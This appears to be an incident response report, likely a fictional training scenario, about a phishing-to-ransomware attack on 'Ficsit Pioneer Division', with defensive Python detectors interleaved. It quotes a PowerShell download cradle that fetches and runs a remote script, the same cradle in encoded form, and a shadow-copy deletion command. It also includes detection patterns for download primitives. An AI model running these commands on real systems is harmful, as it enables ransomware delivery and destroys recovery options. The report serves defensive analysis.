CONFIDENTIAL  //  TLP:AMBER  //  Handle via need-to-know only — Ficsit Inc. Internal
Incident Response Report  ·  Ficsit Inc. Pioneer Division
Operation IRON CHIMNEY
AiTM Phishing · IRONLOCK v2.1 Ransomware · MFA Fatigue · Double Extortion — Full forensic incident report covering initial access through containment and recovery planning.
Report ID: RPT-2026-0087
SIEM Investigation: INV-2024-0087
SOAR Case: CASE-2024-0267
Severity: Critical — 94/100
Status: Active — Contain Phase
Threat Actor: IRON CHIMNEY (TA-001)
Incident Date: May 27, 2026
Report Date: May 27, 2026 · 16:00 UTC
Lead Analyst: pioneer (Security Analyst)
Incident Commander: j.rodriguez (IR Lead)
Classification: CONFIDENTIAL // TLP:AMBER
Distribution: Security, Legal, Executive
Section 01
Executive Summary
Files encrypted: 847
Data exfiltrated: 547 MB
Accounts compromised: 2
SOAR playbooks triggered: 3
Detection to alert: <4 min
Detection to isolation: 14 min

On May 27, 2026, Ficsit Inc. Pioneer Division sustained a sophisticated, multi-stage cyberattack attributed with high confidence to IRON CHIMNEY (TA-001), an Eastern European ransomware-as-a-service (RaaS) operator. The attack chain began at 10:09 UTC with a targeted spearphishing email (THREAT-001) delivering a macro-enabled Excel dropper (MAM_Update_Q4_2026.xlsm) to the pioneer account. The lure was purpose-crafted to exploit knowledge of Ficsit's internal M.A.M. (Material Acquisition & Management) research project — intelligence likely obtained during pre-attack reconnaissance activity spanning at least 7 days prior.

The attacker employed an Adversary-in-the-Middle (AiTM) phishing proxy hosted at pioneer-updates.svc.net (resolving to C2 IP 185.220.101.47) to intercept and replay the authentication session token for the pioneer account, entirely bypassing multi-factor authentication. A concurrent but independent attack vector compromised executive account m.blake through an MFA fatigue / push-bombing campaign, allowing the attacker to enumerate internal host inventory, user directories, and full network subnet topology via the Ficsit Admin Portal — reconnaissance directly leveraged to deploy a targeted ransomware payload.

At 14:28 UTC, a PowerShell encoded download cradle executed on RESEARCH-STATION-01, pulling IRONLOCK v2.1 ransomware from a typosquatted staging domain (update-cdn.ficsit-external.com). Prior to encryption, 547 MB of research data was exfiltrated to the attacker's C2 server via Rclone — confirming a double-extortion strategy designed to apply financial pressure even if backup recovery is available. At 14:31 UTC, 847 files were encrypted with the .encrypted extension within 4 minutes. The process also deleted Volume Shadow Copies (VSS) to impede recovery and created a scheduled task for persistence.

RESEARCH-STATION-01 was isolated from the FICSIT-NET backbone at 14:45 UTC — 14 minutes after initial ransomware detection. Factory operations, HUB systems, and production infrastructure were not affected. Three SOAR playbooks executed automatically across the incident: PB-001 (AiTM Phishing Response), PB-002 (MFA Fatigue Lockdown), and PB-003 (Ransomware Containment). Ficsit Corp Security & Legal were notified at 15:15 UTC. A forensic disk image of RESEARCH-STATION-01 is in progress. No ransom has been paid; no decryption key has been received.

Key Finding
The attacker's use of purpose-built M.A.M.-themed lures — combined with pre-attack credential phishing (THREAT-025) and malware delivery (THREAT-021) from the same C2 infrastructure — indicates a deliberate, targeted campaign against Ficsit Pioneer Division, not an opportunistic attack. The attacker possessed insider knowledge of internal project names and terminology prior to the initial access event.
Section 02
Incident Overview
Incident ID: INV-2024-0087
SOAR Case: CASE-2024-0267
Incident Name: Ransomware Activity — Research & Development (IRON CHIMNEY)
Operation Name: Operation SMELTING (IRON CHIMNEY internal designation)
Threat Actor: IRON CHIMNEY (TA-001) — Eastern European RaaS operator
Incident Type: T-RANSOM: Ransomware with Pre-Encryption Exfiltration (Double Extortion)
Attack Vectors: AiTM Phishing (T1566.001), MFA Fatigue (T1110.003), PowerShell Execution (T1059.001), Ransomware (T1486)
Severity Score: 94 / 100 — Critical
Status: ACTIVE — Contain Phase (forensic imaging in progress)
First Alert: May 27, 2026 · 10:09 UTC — ALT-7272 (AiTM Session Hijack)
Ransomware Alert: May 27, 2026 · 14:31 UTC — ALT-7291 (File Extension Mass-Rename)
Investigation Created: May 27, 2026 · 14:35 UTC (SIEM auto-correlation)
Isolation Completed: May 27, 2026 · 14:45 UTC
Attack Duration: 10:09 – 14:35 UTC (4 hours 26 minutes)
Lead Analyst: pioneer (Security Analyst)
Incident Commander: j.rodriguez (IR Lead)
Affected Systems: RESEARCH-STATION-01, PIONEER-WS-01, FICSIT-HUB-CORE (m.blake session)
Files Encrypted: 847 files (.encrypted extension) on RESEARCH-STATION-01
Data Exfiltrated: 547 MB (Rclone to 185.220.101.47:443); additional 14.7 GB via compromised Dropbox account (pending confirmation)
Compromised Accounts: pioneer@ficsit-pioneer.corp (AiTM), m.blake@ficsit-pioneer.corp (MFA fatigue)
Ransomware Family: IRONLOCK v2.1 (IRON CHIMNEY proprietary); SHA256: a3f8d4c2…7e2b
Regulatory Notification: Pending legal review — potential data breach notification required
Data Sensitivity: High — M.A.M. research notes, SCADA configurations, facility blueprints, xenobiology data
Business Impact: R&D files unavailable; no factory or production systems affected
Ransom Demand: Not yet received; ransom note (README_DECRYPT.txt) dropped in all affected directories
Payment Status: No payment made; policy prohibits ransomware payment without explicit Board authorization
Section 03
Timeline of Events

The following timeline covers all security events from the earliest known attacker activity (May 19, 2026) through the current containment phase. Times are UTC.

Pre-Attack Reconnaissance Phase (May 19–26, 2026)
May 19 07:30
Recon
VPN brute force targeting pioneer and m.blake accounts from 91.134.77.22 — 8,420 failed attempts over 2 hours. Account lockout triggered. No successful logins confirmed. (INV-2024-0076)
May 20 16:08
Recon
THREAT-025: Credential phishing email targeting pioneer@ficsit-pioneer.corp from ficsit-account-verify.com. Originating IP 185.220.101.47 — same infrastructure as the May 27 attack. Blocked. Attacker was actively testing phishing templates against the pioneer account.
May 21 ~09:00
Infrastructure
Typosquat domain pioneer-updates.svc.net registered (WHOIS: NameSilo, registrant hidden behind WhoisGuard). 6 days before the main attack. This domain was used as the AiTM phishing proxy on attack day.
May 21 ~09:00
Infrastructure
Typosquat domain update-cdn.ficsit-external.com registered. Used on attack day as the payload staging server for the IRONLOCK download cradle.
May 22 14:17
Delivery Attempt
THREAT-021: Malware PDF targeting pioneer@ficsit-pioneer.corp. Subject: "Research Digest: M.A.M. Platform Developments — May 2026". Payload: MAM_Research_Digest_May2026.pdf containing embedded exploit (CVE-2023-21716). Originating IP: 185.220.101.47. Quarantined. This confirms the attacker had prior knowledge of the M.A.M. project name.
Attack Day — May 27, 2026
01:44
Unauthorized Access
ALT-7295 / INV-2024-0081: Successful authentication to FICSIT-HUB-CORE from pioneer account from residential VPN IP 92.118.37.91. Outside business hours (08:00–20:00 UTC). Two R&D files accessed: MAM-Field-Notes-2026.docx and pioneer-access-log-2026.xlsx. Pioneer confirmed they were asleep — session not initiated by legitimate user. This may represent the attacker using previously obtained pioneer credentials for pre-attack reconnaissance of R&D files.
09:10
Phishing Campaign
ALT-7296 / INV-2024-0080: Phishing campaign targeting 14 Engineering Division employees. Sender spoofed as Ficsit IT Help Desk (helpdesk@ficsit-corp-it.com). Subject: "Urgent: Password Reset Required." Credential harvesting page at ficsit-it-portal.com. 2 employees clicked; 1 (svc-factory) submitted credentials. Appears to be a concurrent attack by a different actor, or an IRON CHIMNEY diversionary tactic.
10:09
Initial Access
THREAT-001: Spearphishing email delivered to pioneer@ficsit-pioneer.corp. Sender: "Ficsit Research Platform" <updates@pioneer-updates.svc.net>. Subject: "M.A.M. Research Platform — Q4 Update Required." Attachment: MAM_Update_Q4_2026.xlsm (macro-enabled Excel, 487 KB). Domain pioneer-updates.svc.net registered 6 days prior. DMARC FAIL despite SPF/DKIM PASS (domain mismatch). Originating IP: 185.220.101.47. ALT-7272 fired: AiTM Session Hijack — session cookie for pioneer account intercepted and replayed. MFA bypassed. SOAR PB-001 triggered automatically.
10:14
Execution
Pioneer opens MAM_Update_Q4_2026.xlsm and enables macros. Macro executes PowerShell stager that connects to C2 185.220.101.47. Session cookie intercepted by AiTM proxy at pioneer-updates.svc.net. Account risk score elevated to 94 (ATO-001). SOAR PB-001 executing: sessions revoked, phishing domain blocked at NGFW, SOC notified.
11:55
Pre-Exfil Staging
ALT-7299 / INV-2024-0079: 3.2 GB of R&D files bulk-copied from multiple project directories to staging folder \\FICSIT-FS-01\RnD\tmp\archive_2026\ over 45 minutes using the pioneer account (1,247 files). Contents: M.A.M. research notes, alien xenobiology data, SCADA config exports, facility blueprints. Activity occurring under compromised pioneer session — likely attacker staging data for subsequent exfiltration.
14:10
MFA Fatigue
ALT-7285 / INV-2024-0086: 3 consecutive MFA authentication push notifications rejected for executive account m.blake from external IP 203.0.113.88 within 7 minutes. Pattern consistent with MFA fatigue / push-bombing attack. IP 203.0.113.88 shares ASN with C2 IP 185.220.101.47. SOAR PB-002 queued.
14:17
Account Compromise
ALT-7288: Successful MFA authentication for m.blake from 203.0.113.88 — 7 minutes after 3 consecutive push rejections. 4th push notification accepted, likely due to push fatigue. Admin Portal session established (session ID: bae941f2, 22 minutes). Session activity: 14 host inventory API calls (/api/v1/inventory/hosts), 6 user directory calls (/api/v1/directory/users), 1 subnet map export (/api/v1/network/subnet-map) — systematic internal reconnaissance used to tailor the ransomware deployment.
14:28
Execution
ALT-7278: PowerShell encoded command executed on RESEARCH-STATION-01 (user: pioneer). Decoded payload:
iex (New-Object System.Net.WebClient).DownloadString('http://update-cdn.ficsit-external.com/mam/latest/update.ps1')
Staging domain update-cdn.ficsit-external.com registered 3 days prior. Download cradle pulled IRONLOCK v2.1 ransomware payload. Simultaneous: ALT-7287 — 547 MB exfiltrated from PIONEER-WS-01 to 185.220.101.47:443 over 183 seconds (Rclone). Firewall alert fired; traffic not blocked pending rule confirmation.
14:31
Ransomware Execution
ALT-7291 — CRITICAL: EDR detected 847 files renamed to .encrypted extension in 238 seconds (under 4 minutes) by unsigned process pioneer_research_tool.exe (SHA256: a3f8d4c2e1b9f0741d6c3a8b5e7f2d09c4b1e3a8f6d2c7b0e5a4f1d8c3b9e7). Ransom note README_DECRYPT.txt dropped in all affected directories. Scheduled task \Microsoft\Windows\Update\Updater created for persistence. Shadow copies deleted (vssadmin.exe). Process quarantined by EDR.
14:35
Detection
INV-2024-0087 auto-created by SIEM correlation engine. Alerts ALT-7291, ALT-7287, ALT-7278 linked. SOAR PB-003 (Ransomware Containment) triggered automatically.
14:37
Response
pioneer assigned to investigation. Status set ACTIVE. Analyst begins triage of correlated alerts.
14:42
Response
Log query confirmed: 847 files renamed in 4-minute window. Binary pioneer_research_tool.exe confirmed unsigned and absent from software inventory. SHA256 submitted to threat intelligence for cross-referencing.
14:45
Containment
RESEARCH-STATION-01 isolated from FICSIT-NET backbone. Factory, HUB, and production segments unaffected. Network isolation prevents any further C2 communication or lateral movement from the endpoint.
14:47
Containment
m.blake session revoked. All active sessions invalidated. Account suspended. Step-up authentication enforced on all Admin Portal access. SOAR PB-002 completed: force MFA re-enrollment queued.
14:50
Intel
IOC 185.220.101.47 added to Ficsit threat intelligence. Cross-referenced: confirmed Tor exit node (AS44901/Blazingfast LLC), listed on abuse.ch Feodo Tracker. Associated with IRON CHIMNEY ransomware operations targeting industrial networks.
15:00
Correlation
IP 185.220.101.47 confirmed in both INV-2024-0087 and INV-2024-0086. IP 203.0.113.88 (m.blake MFA attack) confirmed to share ASN with 185.220.101.47. Analyst note: "Timeline suggests executive account was compromised first, enumerated internal resources, then a tailored payload was delivered. Treating both as a single coordinated campaign."
15:15
Escalation
Ficsit Corp Security & Legal notified. Executive briefing requested within 2 hours. Incident Commander j.rodriguez formally assigned.
15:30
Update
Severity score confirmed 94/100. Priority escalated to CRITICAL. Forensic disk image of RESEARCH-STATION-01 initiated (in progress).
Section 04
Technical Analysis — Attack Chain

The IRON CHIMNEY attack against Ficsit Pioneer Division followed a structured, multi-phase kill chain spanning at least 7 days of pre-attack preparation. The attack is notable for its use of two independent initial access vectors executed in parallel — an AiTM phishing attack against a research analyst account and an MFA fatigue attack against an executive account — with intelligence gathered from the second used to tailor the ransomware payload delivered through the first.

Initial Access · AiTM Phishing / Session Hijack · T1566.001
Execution · Malicious Macro + PowerShell Cradle · T1204.002
Persistence · Scheduled Task · T1053.005
Defense Evasion · Encoded Commands + VSS Delete · T1140
Credential Access · LSASS Dump Attempt + MFA Fatigue · T1003.001
Discovery · Network + User Enumeration · T1016
Collection · Data Staging (3.2 GB R&D) · T1074.001
Exfiltration · Rclone to C2 (547 MB) · T1048.002
Impact · IRONLOCK v2.1 Ransomware · T1486
4.1 Initial Access (T1566.001 — Spearphishing Attachment)

The primary initial access vector was a spearphishing email (THREAT-001) crafted to exploit specific knowledge of Ficsit's M.A.M. (Material Acquisition & Management) research platform. The email was delivered at 10:09 UTC on May 27, 2026, to pioneer@ficsit-pioneer.corp from the spoofed display name "Ficsit Research Platform" using the attacker-controlled domain pioneer-updates.svc.net.

Critically, this email employed an Adversary-in-the-Middle (AiTM) phishing technique rather than a simple credential harvesting page. The phishing link routed the victim's authentication through an attacker-controlled transparent proxy, allowing the adversary to intercept the authenticated session token in real time — entirely bypassing MFA, as the token was captured post-authentication.

Email authentication analysis: SPF and DKIM both passed for pioneer-updates.svc.net (the attacker's own domain); however, DMARC failed due to misalignment with the legitimate ficsit-pioneer.corp domain. The originating IP 185.220.101.47 was present in the email headers and was subsequently confirmed as a known IRON CHIMNEY C2 node.

Finding
The DMARC failure was detectable at the gateway but the email was delivered because the M.A.M.-specific subject and attachment name were sufficiently convincing to pass human review. A stricter DMARC reject policy on ficsit-pioneer.corp would not have blocked this email (attacker used their own domain), but enhanced BEC/impersonation detection heuristics may have flagged the display name discrepancy.
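The display-name heuristic this finding refers to, written out as an added illustration that is not part of the report or of Ficsit's gateway configuration; the org domain list and brand tokens are assumed, and the sender values tested are the ones quoted for THREAT-001 and the May 27 help-desk campaign.

```python
import re

# Constructed gateway configuration (assumption, not from the report):
# domains the organisation actually sends from, and brand words an impostor
# is likely to reuse in a display name or a lookalike domain.
ORG_DOMAINS = {"ficsit-pioneer.corp"}
BRAND_TOKENS = {"ficsit", "pioneer"}


def _is_org_domain(domain: str) -> bool:
    """True if the domain is one of ours or a subdomain of one of ours."""
    d = domain.lower().rstrip(".")
    return any(d == org or d.endswith("." + org) for org in ORG_DOMAINS)


def _tokens(text: str) -> set:
    """Lower-cased words, split on anything that is not a letter or digit."""
    return {t for t in re.split(r"[^a-z0-9]+", text.lower()) if t}


def assess_sender(display_name: str, from_addr: str, dmarc_result: str) -> dict:
    """Score a sender for brand impersonation.

    display_name and from_addr come from the RFC 5322 From header;
    dmarc_result is the gateway's Authentication-Results DMARC verdict.
    """
    domain = from_addr.rsplit("@", 1)[-1]
    org_sender = _is_org_domain(domain)
    flags = []
    # Display name borrows our brand while the message does not come from us.
    if not org_sender and _tokens(display_name) & BRAND_TOKENS:
        flags.append("display_name_impersonation")
    # Domain labels borrow our brand: lookalike / typosquat registration.
    if not org_sender and _tokens(domain) & BRAND_TOKENS:
        flags.append("lookalike_domain")
    if flags and dmarc_result.lower() != "pass":
        verdict = "quarantine"
    elif flags:
        verdict = "flag"
    else:
        verdict = "deliver"
    return {"domain": domain, "org_sender": org_sender,
            "flags": flags, "verdict": verdict}
```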
4.2 Execution (T1204.002, T1059.001)

The phishing attachment MAM_Update_Q4_2026.xlsm was a macro-enabled Excel file (487 KB). When the victim opened the file and enabled macros, a VBA macro executed a PowerShell command that downloaded and ran a first-stage stager from the AiTM proxy server. The macro body decoded a base64-encoded PowerShell download cradle:

Decoded PowerShell Macro Payload (from EDR telemetry)
iex (New-Object System.Net.WebClient).DownloadString('http://update-cdn.ficsit-external.com/mam/latest/update.ps1')

A second, distinct execution event occurred at 14:28 UTC when a separate PowerShell encoded command executed on RESEARCH-STATION-01. This encoded command (observed in Windows Event ID 4688) used a different staging URL and was likely the primary IRONLOCK payload delivery mechanism:

EDR Log — PowerShell Encoded Command (ALT-7278)
2026-05-27T14:28:33Z  RESEARCH-STATION-01  WinEvent  EventID=4688
  SubjectUserName=pioneer  SubjectDomainName=FICSIT
  NewProcessName=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentProcessName=C:\Windows\System32\cmd.exe  pid=3201  ppid=2440
  CommandLine=powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden
    -EncodedCommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcw...

  [EDR DECODE] Base64 payload resolves to:
  iex (New-Object System.Net.WebClient).DownloadString(
    'http://update-cdn.ficsit-external.com/mam/latest/update.ps1')
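An added decoder and classifier for records like the one above (not the SOC's own tooling): the 4688 event is constructed from the decoded cradle shown, because the report's base64 blob is truncated, and the same check covers the -EncodedCommand evasion discussed under Defense Evasion.

```python
import base64
import re

# Decoded download cradle exactly as shown in the ALT-7278 EDR entry.
CRADLE = ("iex (New-Object System.Net.WebClient).DownloadString("
          "'http://update-cdn.ficsit-external.com/mam/latest/update.ps1')")


def encode_powershell(script: str) -> str:
    """-EncodedCommand takes base64 of the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed 4688 record modelled on the EDR log above; the base64 operand is
# generated from CRADLE here since the report's blob is cut off with "...".
SAMPLE_EVENT = """2026-05-27T14:28:33Z  RESEARCH-STATION-01  WinEvent  EventID=4688
  SubjectUserName=pioneer  SubjectDomainName=FICSIT
  NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
  ParentProcessName=C:\\Windows\\System32\\cmd.exe  pid=3201  ppid=2440
  CommandLine=powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden
    -EncodedCommand <B64>
""".replace("<B64>", encode_powershell(CRADLE))

# -e, -ec, -en, -enc and -encodedcommand are all accepted by PowerShell
# (any unambiguous prefix), so match them all before the base64 operand.
ENC_FLAG = re.compile(r"(?i)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
EXEC_PRIMITIVE = re.compile(r"(?i)\biex\b|invoke-expression")
DOWNLOAD_PRIMITIVE = re.compile(
    r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient")
URL = re.compile(r"https?://[^\s'\"()]+")


def decode_encoded_command(command_line: str):
    """Return the decoded script of an -EncodedCommand invocation, else None."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)          # tolerate stripped padding
    try:
        return base64.b64decode(blob).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def analyze_event(event_text: str) -> dict:
    """Pull user/host/command line out of a 4688 record, decode the payload and
    classify it as a download cradle when it both executes and downloads."""
    host = event_text.split()[1]
    user = re.search(r"SubjectUserName=(\S+)", event_text)
    cmd = re.search(r"CommandLine=(.*)", event_text, re.S)
    command_line = " ".join(cmd.group(1).split()) if cmd else ""
    decoded = decode_encoded_command(command_line) or ""
    is_cradle = bool(EXEC_PRIMITIVE.search(decoded) and DOWNLOAD_PRIMITIVE.search(decoded))
    return {
        "host": host,
        "user": user.group(1) if user else None,
        "decoded": decoded,
        "urls": URL.findall(decoded),
        "is_download_cradle": is_cradle,
    }
```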
4.3 Persistence (T1053.005 — Scheduled Task)

IRONLOCK v2.1 created a persistence mechanism via a Windows Scheduled Task named \Microsoft\Windows\Update\Updater — designed to blend in with legitimate Windows Update scheduler entries. The task was configured to re-execute the PowerShell payload on system startup and at user logon, ensuring the ransomware or its C2 communication mechanism would survive a reboot.

This persistence mechanism was observed in the EDR telemetry immediately following the mass file rename event and was flagged in ALT-7291. The scheduled task was confirmed and quarantined as part of SOAR PB-003 execution. No evidence of the task executing post-containment.

4.4 Defense Evasion (T1140, T1490)

IRON CHIMNEY employed multiple defense evasion techniques:

Encoded Commands: All PowerShell payloads were delivered through the base64-encoded -EncodedCommand parameter to evade simple string-based detection rules that look for plaintext download URLs.

VSS Shadow Copy Deletion (T1490): IRONLOCK deleted Volume Shadow Copies using vssadmin.exe delete shadows /all /quiet immediately prior to initiating file encryption. This prevents victim recovery via Windows Previous Versions and removes a key recovery path without requiring decryption keys. EDR telemetry captured this execution event as part of the ransomware process chain from pioneer_research_tool.exe.

Masquerading (T1036): The ransomware binary was named pioneer_research_tool.exe — mimicking a legitimate Pioneer Division research utility. The scheduled task was placed in the \Microsoft\Windows\Update\ namespace. Both choices indicate deliberate effort to blend into expected system activity.

Process Injection: The ransomware process spawned from cmd.exe, which is consistent with execution via the PowerShell download cradle rather than direct execution — adding one level of process ancestry obfuscation.

4.5 Credential Access (T1003.001, T1110.003)

Two credential access techniques were employed in this incident:

LSASS Memory Dumping (T1003.001): EDR detection DET-0040 on PIONEER-WS-01 flagged a blocked LSASS credential dump attempt by the attacker process. The EDR agent intercepted the process memory read of lsass.exe and blocked it successfully. This suggests the attacker attempted to harvest additional account credentials to expand their foothold or facilitate lateral movement — possibly targeting service account credentials stored in memory.

MFA Fatigue / Push Bombing (T1110.003): The m.blake account was targeted through persistent MFA push notification spam — sending 3 notifications in 7 minutes until the user accepted the 4th. This technique exploits user fatigue and the assumption that an unexpected push may be a system glitch. The 22-minute admin session that followed was used for systematic internal reconnaissance. This attack vector ran concurrently and independently of the pioneer AiTM attack, demonstrating a sophisticated dual-pronged approach.
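Detection logic for the push-bombing sequence described above, added here as an example and not taken from the report's SOAR playbook: it alerts when an approval follows a burst of denials from the same source IP for the same user; the IdP log format and timestamps are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed IdP push log modelled on the ALT-7285 / ALT-7288 sequence for
# m.blake; the exact timestamps and the pioneer lines are invented.
# Lines are assumed to arrive in chronological order.
SAMPLE_LOG = """\
2026-05-27T14:10:02Z user=m.blake ip=203.0.113.88 event=mfa_push result=denied
2026-05-27T14:12:40Z user=m.blake ip=203.0.113.88 event=mfa_push result=denied
2026-05-27T14:15:51Z user=m.blake ip=203.0.113.88 event=mfa_push result=denied
2026-05-27T14:17:09Z user=m.blake ip=203.0.113.88 event=mfa_push result=approved
2026-05-27T14:20:00Z user=pioneer ip=10.0.1.42 event=mfa_push result=denied
2026-05-27T14:21:00Z user=pioneer ip=10.0.1.42 event=mfa_push result=approved
"""

LINE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) ip=(?P<ip>\S+) event=mfa_push result=(?P<result>\S+)$")


def parse_line(line: str):
    """Parse one push event; returns None for lines that are not push events."""
    m = LINE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return rec


def detect_mfa_fatigue(lines, min_denials=3, window=timedelta(minutes=10)):
    """Alert when an approval follows at least min_denials denials from the
    same (user, source IP) inside the window: the push-bombing pattern."""
    denials = defaultdict(list)      # (user, ip) -> timestamps of denials
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["user"], rec["ip"])
        if rec["result"] == "denied":
            denials[key].append(rec["ts"])
            continue
        if rec["result"] != "approved":
            continue
        recent = [t for t in denials[key] if rec["ts"] - t <= window]
        if len(recent) >= min_denials:
            alerts.append({"user": rec["user"], "ip": rec["ip"],
                           "denials": len(recent),
                           "first_denial": recent[0],
                           "approved_at": rec["ts"]})
        denials[key].clear()         # an approval ends the burst either way
    return alerts
```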

4.6 Discovery (T1016, T1087, T1046)

Internal reconnaissance was conducted via the compromised m.blake admin portal session between 14:17 and 14:39 UTC. The attacker made 21 API calls to the Ficsit Admin Portal:

Time | API Endpoint | Calls | Intelligence Gathered
14:17–14:30 | /api/v1/inventory/hosts | 14 | Full host inventory — all hostnames, IPs, OS versions, roles
14:18–14:33 | /api/v1/directory/users | 6 | User directory — all accounts, roles, email addresses
14:20 | /api/v1/network/subnet-map | 1 | Complete internal network topology export

This reconnaissance directly informed the attacker's targeting decision — RESEARCH-STATION-01 was subsequently identified as the ransomware deployment target, consistent with its role as the primary R&D workstation in the host inventory. The subnet map export would have revealed network segmentation, enabling the attacker to avoid production and factory segments that were more likely to trigger rapid detection.

Additionally, an internal network scan (DET-0035, nmap) was observed from a compromised endpoint prior to the ransomware execution phase, consistent with lateral movement preparation.

4.7 Collection (T1074.001, T1119)

Prior to exfiltration, the attacker staged 3.2 GB of R&D files into a single archive directory (\\FICSIT-FS-01\RnD\tmp\archive_2026\) over a 45-minute window between 11:55 and 12:40 UTC. This activity was attributed to the pioneer account and detected as ALT-7299 / INV-2024-0079.

Files staged include material of significant research and operational sensitivity:

File | Source Directory | Sensitivity
MAM-Field-Notes-2026.docx | \RnD\Xenobiology\ | High — M.A.M. research data
alien-consciousness-draft-v7.pdf | \RnD\M.A.M.Research\ | High — proprietary research
scada-config-export-all-zones.xlsx | \RnD\Facilities\ | Critical — OT/SCADA configs
pioneer-facility-blueprint-q2.dwg | \RnD\Engineering\ | High — facility blueprints

Whether these staged files were subsequently included in the 547 MB exfiltration payload is under active investigation (INV-2024-0079 task: "Determine if staged files were subsequently exfiltrated").

4.8 Exfiltration (T1048.002)

At 14:28 UTC, 547 MB of data was transferred from PIONEER-WS-01 to C2 IP 185.220.101.47:443 over 183 seconds (approximately 3 minutes). The transfer volume (573,741,824 bytes) and destination IP were detected by firewall alert ALT-7287. The traffic was routed on port 443 using TLS, consistent with Rclone — a legitimate cloud sync tool commonly misused by ransomware actors for exfiltration (T1567).

Firewall Log — Exfiltration Event (ALT-7287)
May 27 14:28:11 FICSIT-FW-CORE CEF:0|FicsitSec|NGFW|4.2|1201|LargeOutboundTransfer|HIGH
  src=10.0.1.42 spt=50122 dst=185.220.101.47 dpt=443 proto=TCP
  bytes_out=573741824 bytes_in=1802 duration_sec=183
  geo_dst="NL/Tor exit node"  asn_dst=AS60068 (CDN77)
  flow_id=a9f3d21c-4481  rule_matched="Exfil::LargeOutbound>500MB"

May 27 14:31:18 FICSIT-FW-CORE IDS-ALERT: Signature 2025441 "ET TROJAN Ransomware C2 Beacon"
  src=10.0.1.42 dst=185.220.101.47 sid=2025441 priority=1
  note: not blocked — firewall rule pending confirmation at time of alert

The firewall alert fired but traffic was not blocked pending manual rule confirmation — a critical gap in automated response. SOAR PB-003 subsequently pushed an automated firewall block rule for 185.220.101.47, but this occurred after exfiltration had already completed. A 14.7 GB exfiltration via a compromised Dropbox account (attributed to m.blake) is also under investigation and may represent a secondary exfiltration channel.

Critical Gap
The firewall rule requiring manual confirmation for outbound blocks allowed the exfiltration to complete despite an active IDS alert matching a known ransomware C2 signature. Automating firewall response for confirmed C2 IPs from threat intelligence feeds would have reduced or eliminated exfiltration loss.
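The automated block decision this gap analysis calls for, as an added example (not the NGFW's or SOAR's actual rule): it parses the ALT-7287 CEF record printed above and applies the policy that confirmed C2 destinations block automatically while large transfers to unknown destinations go to review; the threat-intel set and the 500 MB threshold are assumptions.

```python
import re

# Constructed threat-intel set (assumption); 185.220.101.47 is the C2 IP
# confirmed in this report.
CONFIRMED_C2 = {"185.220.101.47"}
LARGE_OUTBOUND_BYTES = 500 * 1024 * 1024     # the NGFW rule's >500MB threshold

# The ALT-7287 NGFW event as printed above, reflowed onto one line the way a
# syslog collector would deliver it.
SAMPLE_CEF = (
    "May 27 14:28:11 FICSIT-FW-CORE CEF:0|FicsitSec|NGFW|4.2|1201|LargeOutboundTransfer|HIGH"
    " src=10.0.1.42 spt=50122 dst=185.220.101.47 dpt=443 proto=TCP"
    " bytes_out=573741824 bytes_in=1802 duration_sec=183"
    ' geo_dst="NL/Tor exit node" asn_dst=AS60068 (CDN77)'
    ' flow_id=a9f3d21c-4481 rule_matched="Exfil::LargeOutbound>500MB"'
)

HEADER_FIELDS = ("version", "vendor", "product", "product_version",
                 "signature_id", "name", "severity")
KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_cef(line: str) -> dict:
    """Split a CEF record into its 7 header fields plus the key=value extension."""
    start = line.index("CEF:")
    parts = line[start + 4:].split("|", 6)
    # Severity is followed either by the standard seventh pipe or, as in the
    # NGFW output above, by whitespace before the extension.
    m = re.match(r"([^|\s]*)[|\s]*(.*)", parts[6], re.S)
    rec = dict(zip(HEADER_FIELDS, parts[:6] + [m.group(1)]))
    rec["extension"] = {k: v.strip('"') for k, v in KV.findall(m.group(2))}
    return rec


def decide_action(rec: dict) -> str:
    """Policy: a confirmed C2 destination is blocked without waiting for a
    human; a large transfer to an unknown destination is held for review."""
    ext = rec["extension"]
    bytes_out = int(ext.get("bytes_out", "0"))
    if ext.get("dst") in CONFIRMED_C2:
        return "block"
    if bytes_out > LARGE_OUTBOUND_BYTES:
        return "review"
    return "allow"
```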
4.9 Impact (T1486 — Data Encrypted for Impact)

IRONLOCK v2.1 ransomware (process name: pioneer_research_tool.exe, SHA256: a3f8d4c2e1b9f0741d6c3a8b5e7f2d09c4b1e3a8f6d2c7b0e5a4f1d8c3b9e7) encrypted 847 files on RESEARCH-STATION-01 in 238 seconds using a targeted, directory-aware encryption approach consistent with IRON CHIMNEY's known tooling.

Encrypted file types include research documents (.docx, .pdf, .xlsx), engineering files (.dwg), configuration exports (.xlsx, .ini), and research data archives. A ransom note README_DECRYPT.txt was deposited in every affected directory. All Volume Shadow Copies were deleted prior to encryption, eliminating Windows-native recovery paths.

No factory controllers, SCADA systems, or production databases were impacted. The encryption was contained to RESEARCH-STATION-01 and the staged R&D share. Network isolation at 14:45 UTC prevented any potential lateral spread to additional endpoints.

Section 05
Threat Actor Profile — IRON CHIMNEY (TA-001)
Internal ID: TA-001
Common Name: IRON CHIMNEY
Type: Ransomware-as-a-Service (RaaS) operator
Origin: Eastern Europe (high confidence)
Active Since: Estimated 2022
Primary Motivation: Financial — ransom payments and data extortion
Primary Targets: Industrial / manufacturing, research institutions, mid-market enterprises
Known Tooling: IRONLOCK ransomware family (v1.x–v2.1), Rclone for exfiltration, Cobalt Strike for C2
Confirmed C2 Infrastructure: 185.220.101.47 (Tor exit node, AS44901/Blazingfast LLC); 203.0.113.88 (same ASN, MFA attack)
